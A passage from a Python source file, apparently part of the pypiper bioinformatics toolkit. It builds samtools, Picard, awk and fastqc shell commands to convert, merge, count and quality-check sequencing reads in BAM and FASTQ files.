paired_end):\n \"\"\"\n Build command to convert BAM file to FASTQ file(s) (R1/R2).\n\n :param str bam_file: path to BAM file with sequencing reads\n :param str out_fastq_pre: path prefix for output FASTQ file(s)\n :param bool paired_end: whether the given file contains paired-end\n or single-end sequencing reads\n :return str: file conversion command, ready to run\n \"\"\"\n self.make_sure_path_exists(os.path.dirname(out_fastq_pre))\n cmd = self.tools.java + \" -Xmx\" + self.pm.javamem\n cmd += \" -jar \" + self.tools.picard + \" SamToFastq\"\n cmd += \" I=\" + bam_file\n cmd += \" F=\" + out_fastq_pre + \"_R1.fastq\"\n if paired_end:\n cmd += \" F2=\" + out_fastq_pre + \"_R2.fastq\"\n cmd += \" INCLUDE_NON_PF_READS=true\"\n cmd += \" QUIET=true\"\n cmd += \" VERBOSITY=ERROR\"\n cmd += \" VALIDATION_STRINGENCY=SILENT\"\n return cmd\n\n def bam_to_fastq_awk(self, bam_file, out_fastq_pre, paired_end, zipmode=False):\n \"\"\"\n This converts bam file to fastq files, but using awk. As of 2016, this is much faster\n than the standard way of doing this using Picard, and also much faster than the\n bedtools implementation as well; however, it does no sanity checks and assumes the reads\n (for paired data) are all paired (no singletons), in the correct order.\n :param bool zipmode: Should the output be zipped?\n \"\"\"\n self.make_sure_path_exists(os.path.dirname(out_fastq_pre))\n fq1 = out_fastq_pre + \"_R1.fastq\"\n fq2 = out_fastq_pre + \"_R2.fastq\"\n\n if zipmode:\n fq1 = fq1 + \".gz\"\n fq2 = fq2 + \".gz\"\n fq1_target = ' | \"' + self.ziptool + \" -c > \" + fq1 + '\"'\n fq2_target = ' | \"' + self.ziptool + \" -c > \" + fq2 + '\"'\n else:\n fq1_target = ' > \"' + fq1 + '\"'\n fq2_target = ' > \"' + fq2 + '\"'\n\n if paired_end:\n cmd = self.tools.samtools + \" view \" + bam_file + \" | awk '\"\n cmd += r'{ if (NR%2==1) print \"@\"$1\"/1\\n\"$10\"\\n+\\n\"$11' + fq1_target + \";\"\n cmd += r' else print \"@\"$1\"/2\\n\"$10\"\\n+\\n\"$11' + fq2_target + \"; }\"\n cmd += \"'\" # end the awk command\n else:\n fq2 = None\n cmd = self.tools.samtools + \" view \" + bam_file + \" | awk '\"\n cmd += r'{ print \"@\"$1\"\\n\"$10\"\\n+\\n\"$11' + fq1_target + \"; }\"\n cmd += \"'\"\n return cmd, fq1, fq2\n\n def bam_to_fastq_bedtools(self, bam_file, out_fastq_pre, paired_end):\n \"\"\"\n Converts bam to fastq; A version using bedtools\n \"\"\"\n self.make_sure_path_exists(os.path.dirname(out_fastq_pre))\n fq1 = out_fastq_pre + \"_R1.fastq\"\n fq2 = None\n cmd = (\n self.tools.bedtools\n + \" bamtofastq -i \"\n + bam_file\n + \" -fq \"\n + fq1\n + \".fastq\"\n )\n if paired_end:\n fq2 = out_fastq_pre + \"_R2.fastq\"\n cmd += \" -fq2 \" + fq2\n\n return cmd, fq1, fq2\n\n def get_input_ext(self, input_file):\n \"\"\"\n Get the extension of the input_file. 
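A couple of\n        illustrative calls (file names are hypothetical):\n\n            tk.get_input_ext(\"reads.fastq.gz\")  # -> \".fastq.gz\"\n            tk.get_input_ext(\"reads.bam\")       # -> \".bam\"\n\n        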
Assumes you're using either\n .bam or .fastq/.fq or .fastq.gz/.fq.gz.\n \"\"\"\n if input_file.endswith(\".bam\"):\n input_ext = \".bam\"\n elif input_file.endswith(\".fastq.gz\") or input_file.endswith(\".fq.gz\"):\n input_ext = \".fastq.gz\"\n elif input_file.endswith(\".fastq\") or input_file.endswith(\".fq\"):\n input_ext = \".fastq\"\n else:\n errmsg = (\n \"'{}'; this pipeline can only deal with .bam, .fastq, \"\n \"or .fastq.gz files\".format(input_file)\n )\n raise UnsupportedFiletypeException(errmsg)\n return input_ext\n\n def merge_or_link(self, input_args, raw_folder, local_base=\"sample\"):\n \"\"\"\n Standardizes various input possibilities by converting either .bam,\n .fastq, or .fastq.gz files into a local file; merging those if multiple\n files given.\n\n :param list input_args: This is a list of arguments, each one is a\n class of inputs (which can in turn be a string or a list).\n Typically, input_args is a list with 2 elements: first a list of\n read1 files; second an (optional!) list of read2 files.\n :param str raw_folder: Name/path of folder for the merge/link.\n :param str local_base: Usually the sample name. This (plus file\n extension) will be the name of the local file linked (or merged)\n by this function.\n \"\"\"\n self.make_sure_path_exists(raw_folder)\n\n if not isinstance(input_args, list):\n raise Exception(\"Input must be a list\")\n\n if any(isinstance(i, list) for i in input_args):\n # We have a list of lists. Process each individually.\n local_input_files = list()\n n_input_files = len(list(filter(bool, input_args)))\n print(\"Number of input file sets: \" + str(n_input_files))\n\n for input_i, input_arg in enumerate(input_args):\n # Count how many non-null items there are in the list;\n # we only append _R1 (etc.) if there are multiple input files.\n if n_input_files > 1:\n local_base_extended = local_base + \"_R\" + str(input_i + 1)\n else:\n local_base_extended = local_base\n if input_arg:\n out = self.merge_or_link(input_arg, raw_folder, local_base_extended)\n\n print(\"Local input file: '{}'\".format(out))\n # Make sure file exists:\n if not os.path.isfile(out):\n print(\"Not a file: '{}'\".format(out))\n\n local_input_files.append(out)\n\n return local_input_files\n\n else:\n # We have a list of individual arguments. Merge them.\n\n if len(input_args) == 1:\n # Only one argument in this list. 
A single input file; we just link\n                # it, regardless of file type:\n                # Pull the value out of the list\n                input_arg = input_args[0]\n                input_ext = self.get_input_ext(input_arg)\n\n                # Convert to absolute path\n                if not os.path.isabs(input_arg):\n                    input_arg = os.path.abspath(input_arg)\n\n                # Link it into the raw folder\n                local_input_abs = os.path.join(raw_folder, local_base + input_ext)\n                self.pm.run(\n                    \"ln -sf \" + input_arg + \" \" + local_input_abs,\n                    target=local_input_abs,\n                    shell=True,\n                )\n                # return the local (linked) filename absolute path\n                return local_input_abs\n\n            else:\n                # Otherwise, there are multiple inputs.\n                # If more than 1 input file is given, then these are to be merged\n                # if they are in bam format.\n                if all([self.get_input_ext(x) == \".bam\" for x in input_args]):\n                    sample_merged = local_base + \".merged.bam\"\n                    output_merge = os.path.join(raw_folder, sample_merged)\n                    cmd = self.merge_bams_samtools(input_args, output_merge)\n                    self.pm.debug(\"cmd: {}\".format(cmd))\n                    self.pm.run(cmd, output_merge)\n                    cmd2 = self.validate_bam(output_merge)\n                    self.pm.run(cmd2, output_merge, nofail=True)\n                    return output_merge\n\n                # if multiple fastq\n                if all([self.get_input_ext(x) == \".fastq.gz\" for x in input_args]):\n                    sample_merged_gz = local_base + \".merged.fastq.gz\"\n                    output_merge_gz = os.path.join(raw_folder, sample_merged_gz)\n                    # cmd1 = self.ziptool + \"-d -c \" + \" \".join(input_args) + \" > \" + output_merge\n                    # cmd2 = self.ziptool + \" \" + output_merge\n                    # self.pm.run([cmd1, cmd2], output_merge_gz)\n                    # you can save yourself the decompression/recompression:\n                    cmd = \"cat \" + \" \".join(input_args) + \" > \" + output_merge_gz\n                    self.pm.run(cmd, output_merge_gz)\n                    return output_merge_gz\n\n                if all([self.get_input_ext(x) == \".fastq\" for x in input_args]):\n                    sample_merged = local_base + \".merged.fastq\"\n                    output_merge = os.path.join(raw_folder, sample_merged)\n                    cmd = \"cat \" + \" \".join(input_args) + \" > \" + output_merge\n                    self.pm.run(cmd, output_merge)\n                    return output_merge\n\n                # At this point, we don't recognize the input file types or they\n                # do not match.\n                raise NotImplementedError(\n                    \"Input files must be of the same type, and can only \"\n                    \"merge bam or fastq.\"\n                )\n\n    def input_to_fastq(\n        self,\n        input_file,\n        sample_name,\n        paired_end,\n        fastq_folder,\n        output_file=None,\n        multiclass=False,\n        zipmode=False,\n    ):\n        \"\"\"\n        Builds a command to convert input file to fastq, for various inputs.\n\n        Takes either .bam, .fastq.gz, or .fastq input and returns\n        commands that will create the .fastq file, regardless of input type.\n        This is useful to make your pipeline easily accept any of these input\n        types seamlessly, standardizing on fastq, which is still the\n        most common format for adapter trimmers, etc. You can specify whether\n        you want the output zipped or not.\n\n        Commands will place the output fastq file in the given `fastq_folder`.\n\n        :param str input_file: filename of input you want to convert to fastq\n        :param bool multiclass: Are both read1 and read2 included in a single\n            file? User should not need to set this; it will be inferred and used\n            in recursive calls, based on the number of files, and the paired_end arg.\n        :param bool zipmode: Should the output be .fastq.gz? 
Otherwise, just fastq\n :return str: A command (to be run with PipelineManager) that will ensure\n your fastq file exists.\n \"\"\"\n\n fastq_prefix = os.path.join(fastq_folder, sample_name)\n self.make_sure_path_exists(fastq_folder)\n\n # this expects a list; if it gets a string, wrap it in a list.\n if type(input_file) != list:\n input_file = [input_file]\n\n # If multiple files were provided, recurse on each file individually\n if len(input_file) > 1:\n cmd = []\n output_file = []\n for in_i, in_arg in enumerate(input_file):\n output = fastq_prefix + \"_R\" + str(in_i + 1) + \".fastq\"\n result_cmd, uf, result_file = self.input_to_fastq(\n in_arg,\n sample_name,\n paired_end,\n fastq_folder,\n output,\n multiclass=True,\n zipmode=zipmode,\n )\n cmd.append(result_cmd)\n output_file.append(result_file)\n\n else:\n # There was only 1 input class.\n # Convert back into a string\n input_file = input_file[0]\n if not output_file:\n output_file = fastq_prefix + \"_R1.fastq\"\n if zipmode:\n output_file = output_file + \".gz\"\n\n input_ext = self.get_input_ext(input_file) # handles .fq or .fastq\n\n if input_ext == \".bam\":\n print(\"Found .bam file\")\n # cmd = self.bam_to_fastq(input_file, fastq_prefix, paired_end)\n cmd, fq1, fq2 = self.bam_to_fastq_awk(\n input_file, fastq_prefix, paired_end, zipmode\n )\n # pm.run(cmd, output_file, follow=check_fastq)\n if fq2:\n output_file = [fq1, fq2]\n else:\n output_file = fq1\n elif input_ext == \".fastq.gz\":\n print(\"Found .fastq.gz file\")\n if paired_end and not multiclass:\n if zipmode:\n raise NotImplementedError(\n \"Can't use zipmode on interleaved fastq data.\"\n )\n # For paired-end reads in one fastq file, we must split the\n # file into 2. The pipeline author will need to include this\n # python script in the scripts directory.\n # TODO: make this self-contained in pypiper. 
This is a rare\n # use case these days, as fastq files are almost never\n # interleaved anymore.\n script_path = os.path.join(self.tools.scripts_dir, \"fastq_split.py\")\n cmd = self.tools.python + \" -u \" + script_path\n cmd += \" -i \" + input_file\n cmd += \" -o \" + fastq_prefix\n # Must also return the set of output files\n output_file = [\n fastq_prefix + \"_R1.fastq\",\n fastq_prefix + \"_R2.fastq\",\n ]\n else:\n if zipmode:\n # we do nothing!\n cmd = \"ln -sf \" + input_file + \" \" + output_file\n print(\"Found .fq.gz file; no conversion necessary\")\n else:\n # For single-end reads, we just unzip the fastq.gz file.\n # or, paired-end reads that were already split.\n cmd = (\n self.ziptool + \" -d -c \" + input_file + \" > \" + output_file\n )\n # a non-shell version\n # cmd1 = \"gunzip --force \" + input_file\n # cmd2 = \"mv \" + os.path.splitext(input_file)[0] + \" \" + output_file\n # cmd = [cmd1, cmd2]\n elif input_ext == \".fastq\":\n if zipmode:\n cmd = self.ziptool + \" -c \" + input_file + \" > \" + output_file\n else:\n cmd = \"ln -sf \" + input_file + \" \" + output_file\n print(\"Found .fastq file; no conversion necessary\")\n\n return [cmd, fastq_prefix, output_file]\n\n def check_fastq(self, input_files, output_files, paired_end):\n \"\"\"\n Returns a follow sanity-check function to be run after a fastq conversion.\n Run following a command that will produce the fastq files.\n\n This function will make sure any input files have the same number of reads as the\n output files.\n \"\"\"\n\n # Define a temporary function which we will return, to be called by the\n # pipeline.\n # Must define default parameters here based on the parameters passed in. This locks\n # these values in place, so that the variables will be defined when this function\n # is called without parameters as a follow function by pm.run.\n\n # This is AFTER merge, so if there are multiple files it means the\n # files were split into read1/read2; therefore I must divide by number\n # of files for final reads.\n def temp_func(\n input_files=input_files, output_files=output_files, paired_end=paired_end\n ):\n if type(input_files) != list:\n input_files = [input_files]\n if type(output_files) != list:\n output_files = [output_files]\n\n n_input_files = len(list(filter(bool, input_files)))\n n_output_files = len(list(filter(bool, output_files)))\n\n total_reads = sum(\n [\n int(self.count_reads(input_file, paired_end))\n for input_file in input_files\n ]\n )\n raw_reads = int(total_reads / n_input_files)\n self.pm.pipestat.report(values={\"Raw_reads\": str(raw_reads)})\n\n total_fastq_reads = sum(\n [\n int(self.count_reads(output_file, paired_end))\n for output_file in output_files\n ]\n )\n fastq_reads = int(total_fastq_reads / n_output_files)\n\n self.pm.pipestat.report(values={\"Fastq_reads\": fastq_reads})\n input_ext = self.get_input_ext(input_files[0])\n # We can only assess pass filter reads in bam files with flags.\n if input_ext == \".bam\":\n num_failed_filter = sum(\n [int(self.count_fail_reads(f, paired_end)) for f in input_files]\n )\n pf_reads = int(raw_reads) - num_failed_filter\n self.pm.pipestat.report(values={\"PF_reads\": str(pf_reads)})\n if fastq_reads != int(raw_reads):\n raise Exception(\n \"Fastq conversion error? 
Number of input reads \"\n                    \"doesn't match the number of output reads.\"\n                )\n\n            return fastq_reads\n\n        return temp_func\n\n    def check_trim(\n        self, trimmed_fastq, paired_end, trimmed_fastq_R2=None, fastqc_folder=None\n    ):\n        \"\"\"\n        Build function to evaluate read trimming, and optionally run fastqc.\n\n        This is useful to construct an argument for the 'follow' parameter of\n        a PipelineManager's 'run' method.\n\n        :param str trimmed_fastq: Path to trimmed reads file.\n        :param bool paired_end: Whether the processing is being done with\n            paired-end sequencing data.\n        :param str trimmed_fastq_R2: Path to read 2 file for the paired-end case.\n        :param str fastqc_folder: Path to folder within which to place fastqc\n            output files; if unspecified, fastqc will not be run.\n        :return callable: Function to evaluate read trimming and possibly run\n            fastqc.\n        \"\"\"\n\n        def temp_func():\n            print(\"Evaluating read trimming\")\n\n            if paired_end and not trimmed_fastq_R2:\n                print(\"WARNING: specified paired-end but no R2 file\")\n\n            n_trim = float(self.count_reads(trimmed_fastq, paired_end))\n            self.pm.pipestat.report(values={\"Trimmed_reads\": int(n_trim)})\n            try:\n                rr = float(self.pm.pipestat.retrieve(\"Raw_reads\"))\n            except:\n                print(\"Can't calculate trim loss rate without raw read result.\")\n            else:\n                self.pm.report_result(\n                    \"Trim_loss_rate\", round((rr - n_trim) * 100 / rr, 2)\n                )\n\n            # Also run a fastqc (if installed/requested)\n            if fastqc_folder:\n                if os.path.isabs(fastqc_folder):\n                    self.make_sure_path_exists(fastqc_folder)\n                cmd = self.fastqc(trimmed_fastq, fastqc_folder)\n                self.pm.run(cmd, lock_name=\"trimmed_fastqc\", nofail=True)\n                fname, ext = os.path.splitext(os.path.basename(trimmed_fastq))\n                fastqc_html = os.path.join(fastqc_folder, fname + \"_fastqc.html\")\n                self.pm.pipestat.report(\n                    values={\n                        \"FastQC_report_R1\": {\n                            \"path\": fastqc_html,\n                            \"title\": \"FastQC report R1\",\n                        }\n                    }\n                )\n\n                if paired_end and trimmed_fastq_R2:\n                    cmd = self.fastqc(trimmed_fastq_R2, fastqc_folder)\n                    self.pm.run(cmd, lock_name=\"trimmed_fastqc_R2\", nofail=True)\n                    fname, ext = os.path.splitext(os.path.basename(trimmed_fastq_R2))\n                    fastqc_html = os.path.join(fastqc_folder, fname + \"_fastqc.html\")\n                    self.pm.pipestat.report(\n                        values={\n                            \"FastQC_report_R2\": {\n                                \"path\": fastqc_html,\n                                \"title\": \"FastQC report R2\",\n                            }\n                        }\n                    )\n\n        return temp_func\n\n    def validate_bam(self, input_bam):\n        \"\"\"\n        Wrapper for Picard's ValidateSamFile.\n\n        :param str input_bam: Path to file to validate.\n        :return str: Command to run for the validation.\n        \"\"\"\n        cmd = self.tools.java + \" -Xmx\" + self.pm.javamem\n        cmd += \" -jar \" + self.tools.picard + \" ValidateSamFile\"\n        cmd += \" INPUT=\" + input_bam\n        return cmd\n\n    def merge_bams(self, input_bams, merged_bam, in_sorted=\"TRUE\", tmp_dir=None):\n        \"\"\"\n        Combine multiple files into one.\n\n        The tmp_dir parameter is important because on poorly configured\n        systems, the default can sometimes fill up.\n\n        :param Iterable[str] input_bams: Paths to files to combine\n        :param str merged_bam: Path to which to write combined result.\n        :param bool | str in_sorted: Whether the inputs are sorted\n        :param str tmp_dir: Path to temporary directory.\n        \"\"\"\n        if not len(input_bams) > 1:\n            print(\"No merge required\")\n            return 0\n\n        outdir, _ = os.path.split(merged_bam)\n        if outdir and not os.path.exists(outdir):\n            print(\"Creating path to merge file's folder: '{}'\".format(outdir))\n            os.makedirs(outdir)\n\n        # Handle more intuitive boolean argument.\n        if in_sorted in 
[False, True]:\n            in_sorted = \"TRUE\" if in_sorted else \"FALSE\"\n\n        input_string = \" INPUT=\" + \" INPUT=\".join(input_bams)\n        cmd = self.tools.java + \" -Xmx\" + self.pm.javamem\n        cmd += \" -jar \" + self.tools.picard + \" MergeSamFiles\"\n        cmd += input_string\n        cmd += \" OUTPUT=\" + merged_bam\n        cmd += \" ASSUME_SORTED=\" + str(in_sorted)\n        cmd += \" CREATE_INDEX=TRUE\"\n        cmd += \" VALIDATION_STRINGENCY=SILENT\"\n        if tmp_dir:\n            cmd += \" TMP_DIR=\" + tmp_dir\n\n        return cmd\n\n    def merge_bams_samtools(self, input_bams, merged_bam):\n        cmd = self.tools.samtools + \" merge -f \"\n        cmd += \" -@ \" + str(self.pm.cores)\n        cmd += \" \" + merged_bam + \" \"\n        cmd += \" \".join(input_bams)\n        return cmd\n\n    def merge_fastq(self, inputs, output, run=False, remove_inputs=False):\n        \"\"\"\n        Merge FASTQ files (zipped or not) into one.\n\n        :param Iterable[str] inputs: Collection of paths to files to merge.\n        :param str output: Path to single output file.\n        :param bool run: Whether to run the command.\n        :param bool remove_inputs: Whether to remove the original files after merging.\n        :return NoneType | str: Null if running the command, otherwise the\n            command itself\n        :raise ValueError: Raise ValueError if the call is such that\n            inputs are to be deleted but command is not run.\n        \"\"\"\n        if remove_inputs and not run:\n            raise ValueError(\"Can't delete files if command isn't run\")\n        cmd = \"cat {} > {}\".format(\" \".join(inputs), output)\n        if run:\n            # Pass the full string when shell=True; splitting it would hand\n            # the shell only the first token.\n            subprocess.check_call(cmd, shell=True)\n            if remove_inputs:\n                cmd = \"rm {}\".format(\" \".join(inputs))\n                subprocess.check_call(cmd, shell=True)\n        else:\n            return cmd\n\n    def count_lines(self, file_name):\n        \"\"\"\n        Uses the command-line utility wc to count the number of lines in a file. For MacOS, must strip leading whitespace from wc.\n\n        :param str file_name: name of file whose lines are to be counted\n        \"\"\"\n        x = subprocess.check_output(\n            \"wc -l \" + file_name + \" | sed -E 's/^[[:space:]]+//' | cut -f1 -d' '\",\n            shell=True,\n        )\n        return x.decode().strip()\n\n    def count_lines_zip(self, file_name):\n        \"\"\"\n        Uses the command-line utility wc to count the number of lines in a compressed file. For MacOS, must strip leading whitespace from wc.\n\n        :param str file_name: name of the compressed file whose lines are to be counted\n        \"\"\"\n        x = subprocess.check_output(\n            self.ziptool\n            + \" -d -c \"\n            + file_name\n            + \" | wc -l | sed -E 's/^[[:space:]]+//' | cut -f1 -d' '\",\n            shell=True,\n        )\n        return x.decode().strip()\n\n    def get_chrs_from_bam(self, file_name):\n        \"\"\"\n        Uses samtools to grab the chromosomes from the header that are contained\n        in this bam file.\n        \"\"\"\n        x = subprocess.check_output(\n            self.tools.samtools\n            + \" view -H \"\n            + file_name\n            + \" | grep '^@SQ' | cut -f2| sed s'/SN://'\",\n            shell=True,\n        )\n        # Chromosomes will be separated by newlines; split into list to return\n        return x.decode().split()\n\n    ###################################\n    # Read counting functions\n    ###################################\n    # In these functions, a paired-end read, with 2 sequences, counts as two reads\n\n    def count_unique_reads(self, file_name, paired_end):\n        \"\"\"\n        Sometimes alignment software puts multiple locations for a single read; if you just count\n        those reads, you will get an inaccurate count. 
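(The shell-based counters above boil down to `lines / 4` for a FASTQ file, since each record spans exactly four lines. A pure-Python cross-check, standard library only; the helper name is hypothetical.)

import gzip

def count_fastq_reads(path):
    # One FASTQ record spans exactly 4 lines; gzip.open handles .gz inputs.
    opener = gzip.open if path.endswith(".gz") else open
    with opener(path, "rt") as fh:
        n_lines = sum(1 for _ in fh)
    if n_lines % 4:
        raise ValueError("line count not divisible by 4; truncated FASTQ?")
    return n_lines // 4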
This is _not_ the same as multimapping reads,\n which may or may not be actually duplicated in the bam file (depending on the alignment\n software).\n This function counts each read only once.\n This accounts for paired end or not for free because pairs have the same read name.\n In this function, a paired-end read would count as 2 reads.\n \"\"\"\n if file_name.endswith(\"sam\"):\n param = \"-S\"\n if file_name.endswith(\"bam\"):\n param = \"\"\n if paired_end:\n r1 = self.samtools_view(\n file_name,\n param=param + \" -f64\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n r2 = self.samtools_view(\n file_name,\n param=param + \" -f128\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n else:\n r1 = self.samtools_view(\n file_name,\n param=param + \"\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n r2 = 0\n return int(r1) + int(r2)\n\n def count_unique_mapped_reads(self, file_name, paired_end):\n \"\"\"\n For a bam or sam file with paired or or single-end reads, returns the\n number of mapped reads, counting each read only once, even if it appears\n mapped at multiple locations.\n\n :param str file_name: name of reads file\n :param bool paired_end: True/False paired end data\n :return int: Number of uniquely mapped reads.\n \"\"\"\n\n _, ext = os.path.splitext(file_name)\n ext = ext.lower()\n\n if ext == \".sam\":\n param = \"-S -F4\"\n elif ext == \".bam\":\n param = \"-F4\"\n else:\n raise ValueError(\"Not a SAM or BAM: '{}'\".format(file_name))\n\n if paired_end:\n r1 = self.samtools_view(\n file_name,\n param=param + \" -f64\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n r2 = self.samtools_view(\n file_name,\n param=param + \" -f128\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n else:\n r1 = self.samtools_view(\n file_name,\n param=param + \"\",\n postpend=\" | cut -f1 | sort -k1,1 -u | wc -l | sed -E 's/^[[:space:]]+//'\",\n )\n r2 = 0\n\n return int(r1) + int(r2)\n\n def count_flag_reads(self, file_name, flag, paired_end):\n \"\"\"\n Counts the number of reads with the specified flag.\n\n :param str file_name: name of reads file\n :param str flag: sam flag value to be read\n :param bool paired_end: This parameter is ignored; samtools automatically correctly responds depending\n on the data in the bamfile. We leave the option here just for consistency, since all the other\n counting functions require the parameter. This makes it easier to swap counting functions during\n pipeline development.\n \"\"\"\n\n param = \" -c -f\" + str(flag)\n if file_name.endswith(\"sam\"):\n param += \" -S\"\n return self.samtools_view(file_name, param=param)\n\n def count_multimapping_reads(self, file_name, paired_end):\n \"\"\"\n Counts the number of reads that mapped to multiple locations. Warning:\n currently, if the alignment software includes the reads at multiple locations, this function\n will count those more than once. This function is for software that randomly assigns,\n but flags reads as multimappers.\n\n :param str file_name: name of reads file\n :param paired_end: This parameter is ignored; samtools automatically correctly responds depending\n on the data in the bamfile. We leave the option here just for consistency, since all the other\n counting functions require the parameter. 
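(The `-f64`/`-f128` filters used above select the first and second mate of a pair via SAM flag bits; the bit arithmetic is easy to verify directly. Flag values 99 and 147 are a typical properly-paired mate pair.)

# SAM flag bits relied on by the counters above (see the SAM specification).
FLAG_PAIRED = 0x1            # 1: template has multiple segments
FLAG_UNMAPPED = 0x4          # 4: -F4 keeps mapped reads only
FLAG_FIRST_IN_PAIR = 0x40    # 64: selected by -f64
FLAG_SECOND_IN_PAIR = 0x80   # 128: selected by -f128

def is_first_mate(flag):
    return bool(flag & FLAG_FIRST_IN_PAIR)

assert is_first_mate(99)       # 99 = 1 + 2 + 32 + 64
assert not is_first_mate(147)  # 147 = 1 + 2 + 16 + 128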
This makes it easier to swap counting functions during\n pipeline development.\n \"\"\"\n return int(self.count_flag_reads(file_name, 256, paired_end))\n\n def count_uniquelymapping_reads(self, file_name, paired_end):\n \"\"\"\n Counts the number of reads that mapped to a unique position.\n\n :param str file_name: name of reads file\n :param bool paired_end: This parameter is ignored.\n \"\"\"\n param = \" -c -F256\"\n if file_name.endswith(\"sam\"):\n param += \" -S\"\n return self.samtools_view(file_name, param=param)\n\n def count_fail_reads(self, file_name, paired_end):\n \"\"\"\n Counts the number of reads that failed platform/vendor quality checks.\n :param paired_end: This parameter is ignored; samtools automatically correctly responds depending\n on the data in the bamfile. We leave the option here just for consistency, since all the other\n counting functions require the parameter. This makes it easier to swap counting functions during\n pipeline development.\n \"\"\"\n return int(self.count_flag_reads(file_name, 512, paired_end))\n\n def samtools_view(self, file_name, param, postpend=\"\"):\n \"\"\"\n Run samtools view, with flexible parameters and post-processing.\n\n This is used internally to implement the various count_reads functions.\n\n :param str file_name: file_name\n :param str param: String of parameters to pass to samtools view\n :param str postpend: String to append to the samtools command;\n useful to add cut, sort, wc operations to the samtools view output.\n \"\"\"\n cmd = \"{} view {} {} {}\".format(self.tools.samtools, param, file_name, postpend)\n # in python 3, check_output returns a byte string which causes issues.\n # with python 3.6 we could use argument: \"encoding='UTF-8'\"\"\n return subprocess.check_output(cmd, shell=True).decode().strip()\n\n def count_reads(self, file_name, paired_end):\n \"\"\"\n Count reads in a file.\n\n Paired-end reads count as 2 in this function.\n For paired-end reads, this function assumes that the reads are split\n into 2 files, so it divides line count by 2 instead of 4.\n This will thus give an incorrect result if your paired-end fastq files\n are in only a single file (you must divide by 2 again).\n\n :param str file_name: Name/path of file whose reads are to be counted.\n :param bool paired_end: Whether the file contains paired-end reads.\n \"\"\"\n\n _, ext = os.path.splitext(file_name)\n if not (is_sam_or_bam(file_name) or is_fastq(file_name)):\n # TODO: make this an exception and force caller to handle that\n # rather than relying on knowledge of possibility of negative value.\n return -1\n\n if is_sam_or_bam(file_name):\n param_text = \"-c\" if ext == \".bam\" else \"-c -S\"\n return self.samtools_view(file_name, param=param_text)\n else:\n num_lines = (\n self.count_lines_zip(file_name)\n if is_gzipped_fastq(file_name)\n else self.count_lines(file_name)\n )\n divisor = 2 if paired_end else 4\n return int(num_lines) / divisor\n\n def count_concordant(self, aligned_bam):\n \"\"\"\n Count only reads that \"aligned concordantly exactly 1 time.\"\n\n :param str aligned_bam: File for which to count mapped reads.\n \"\"\"\n cmd = self.tools.samtools + \" view \" + aligned_bam + \" | \"\n cmd += \"grep 'YT:Z:CP'\" + \" | uniq -u | wc -l | sed -E 's/^[[:space:]]+//'\"\n\n return subprocess.check_output(cmd, shell=True).decode().strip()\n\n def count_mapped_reads(self, file_name, paired_end):\n \"\"\"\n Mapped_reads are not in fastq format, so this one doesn't need to accommodate fastq,\n and therefore, doesn't require a 
paired-end parameter because it only uses samtools view.\n Therefore, it's ok that it has a default parameter, since this is discarded.\n\n :param str file_name: File for which to count mapped reads.\n :param bool paired_end: This parameter is ignored; samtools automatically correctly responds depending\n on the data in the bamfile. We leave the option here just for consistency, since all the other\n counting functions require the parameter. This makes it easier to swap counting functions during\n pipeline development.\n :return int: Either return code from samtools view command, or -1 to indicate an error state.\n \"\"\"\n if file_name.endswith(\"bam\"):\n return self.samtools_view(file_name, param=\"-c -F4\")\n if file_name.endswith(\"sam\"):\n return self.samtools_view(file_name, param=\"-c -F4 -S\")\n return -1\n\n def sam_conversions(self, sam_file, depth=True):\n \"\"\"\n Convert sam files to bam files, then sort and index them for later use.\n\n :param bool depth: also calculate coverage over each position\n \"\"\"\n cmd = (\n self.tools.samtools\n + \" view -bS \"\n + sam_file\n + \" > \"\n + sam_file.replace(\".sam\", \".bam\")\n + \"\\n\"\n )\n cmd += (\n self.tools.samtools\n + \" sort \"\n + sam_file.replace(\".sam\", \".bam\")\n + \" -o \"\n + sam_file.replace(\".sam\", \"_sorted.bam\")\n + \"\\n\"\n )\n cmd += (\n self.tools.samtools\n + \" index \"\n + sam_file.replace(\".sam\", \"_sorted.bam\")\n + \"\\n\"\n )\n if depth:\n cmd += (\n self.tools.samtools\n + \" depth \"\n + sam_file.replace(\".sam\", \"_sorted.bam\")\n + \" > \"\n + sam_file.replace(\".sam\", \"_sorted.depth\")\n + \"\\n\"\n )\n return cmd\n\n def bam_conversions(self, bam_file, depth=True):\n \"\"\"\n Sort and index bam files for later use.\n\n :param bool depth: also calculate coverage over each position\n \"\"\"\n cmd = (\n self.tools.samtools\n + \" view -h \"\n + bam_file\n + \" > \"\n + bam_file.replace(\".bam\", \".sam\")\n + \"\\n\"\n )\n cmd += (\n self.tools.samtools\n + \" sort \"\n + bam_file\n + \" -o \"\n + bam_file.replace(\".bam\", \"_sorted.bam\")\n + \"\\n\"\n )\n cmd += (\n self.tools.samtools\n + \" index \"\n + bam_file.replace(\".bam\", \"_sorted.bam\")\n + \"\\n\"\n )\n if depth:\n cmd += (\n self.tools.samtools\n + \" depth \"\n + bam_file.replace(\".bam\", \"_sorted.bam\")\n + \" > \"\n + bam_file.replace(\".bam\", \"_sorted.depth\")\n + \"\\n\"\n )\n return cmd\n\n def fastqc(self, file, output_dir):\n \"\"\"\n Create command to run fastqc on a FASTQ file\n\n :param str file: Path to file with sequencing reads\n :param str output_dir: Path to folder in which to place output\n :return str: Command with which to run fastqc\n \"\"\"\n # You can find the fastqc help with fastqc --help\n try:\n pm = self.pm\n except AttributeError:\n # Do nothing, this is just for path construction.\n pass\n else:\n if not os.path.isabs(output_dir) and pm is not None:\n output_dir = os.path.join(pm.outfolder, output_dir)\n self.make_sure_path_exists(output_dir)\n return \"{} --noextract --outdir {} {}\".format(\n self.tools.fastqc, output_dir, file\n )\n\n def fastqc_rename(self, input_bam, output_dir, sample_name):\n \"\"\"\n Create pair of commands to run fastqc and organize files.\n\n The first command returned is the one that actually runs fastqc when\n it's executed; the second moves the output files to the output\n folder for the sample indicated.\n\n :param str input_bam: Path to file for which to run fastqc.\n :param str output_dir: Path to folder in which fastqc output will be\n written, and 
